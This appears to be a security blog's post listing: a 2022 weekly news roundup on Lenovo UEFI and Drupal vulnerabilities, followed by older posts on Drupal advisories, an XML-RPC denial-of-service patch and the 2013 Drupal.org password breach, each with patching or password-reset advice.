Posts

Cybersecurity Updates For Week 16 of 2022

CVE-2021-3970, CVE-2021-3971, CVE-2021-3972: Lenovo UEFI Firmware Vulnerabilities

Security company ESET discovered 3 new vulnerabilities in the UEFI firmware of Lenovo laptops which affected hundreds of Lenovo models including Lenovo Flex; IdeaPads; Legion; V14, V15, and V17 series; and Yoga laptops.

Read more:
https://securityonline.info/cve-2021-3970-lenovo-uefi-firmware-vulnerabilities/

Hackers Are Getting Caught Exploiting New Bugs More Than Ever

A pair of reports from Mandiant and Google found a spike in exploited zero-day vulnerabilities in 2021. The question is, why?

Read more:
https://www.wired.com/story/zero-day-exploits-vulnerabilities-google-mandiant/

Access Bypass, Data Overwrite Vulnerabilities Patched in Drupal

Drupal on Wednesday announced the release of security updates to resolve a couple vulnerabilities that could lead to access bypass and data overwrite.

Read More:
https://www.securityweek.com/access-bypass-data-overwrite-vulnerabilities-patched-drupal

Other news worth mentioning:

Amazon’s Hotpatch for Log4j Flaw Found Vulnerable to Privilege Escalation Bug
Critical Chipset Bugs Open Millions of Android Devices to Remote Spying
Denonia Malware Shows Evolving Cloud Threats
Oracle Releases 520 New Security Patches With April 2022 CPU
Emotet reestablishes itself at the top of the malware world

Drupageddon

Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users.

More information:
https://www.drupal.org/SA-CORE-2014-005

WordPress and Drupal patched for DDoS vulnerability

WordPress and Drupal have been patched for, amongst other things, a vulnerability that allows an attacker to take down a WordPress or Drupal site.

The PHP XML parser used by both projects has a XML-RPC endpoint is vulnerable to an XML entity expansion attack and other related XML payload attacks which can cause CPU and memory exhaustion and the site’s database to reach the maximum number of open connections. Any of these may lead to the site becoming unavailable or unresponsive (denial of service).

Users of WordPress should upgrade to 3.9.2 as soon as possible: https://www.drupal.org/SA-CORE-2014-004

More information:

Drupal core – Highly Critical Vulnerability

Drupal has sent out a notification about new highly critical issues with the Drupal core. This means that anyone running Drupal should update as soon as possible.

Advisory ID: DRUPAL-SA-CORE-2013-003
Project: Drupal core
Version: 6.x, 7.x
Date: 2013-November-20
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities

More information: https://drupal.org/security

Drupal.org compromised – 967,659 users and (hashed) passwords stolen

The Drupal.org Security Team and Infrastructure Team has discovered unauthorized access to account information on Drupal.org and groups.drupal.org.

Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly. As a precautionary measure, we’ve reset all Drupal.org account holder passwords and are requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps.

Go to https://drupal.org/user/password
Enter your username or email address.
Check your email and follow the link to enter a new password.
It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.

Using the same password for different websites is a very bad idea, and you should avoid it as much as you can. Security tips regarding passwords can be found in our newsletter here: http://bfblogg.wpengine.com/blog/2013/03/08/basefarm-sirt-newsletter-2013-03-08/

More information: https://drupal.org/news/130529SecurityUpdate

High Risk Drupal Vulnerability

New vulnerabilities have been disclosed for Drupal versions lower than 6.28 and 7.19. It is strongly advised to update your installations if you have any, as there is (amongst other things) the possibility of being the victim of XSS-attacks if you do not update.

More information:
http://drupal.org/SA-CORE-2013-001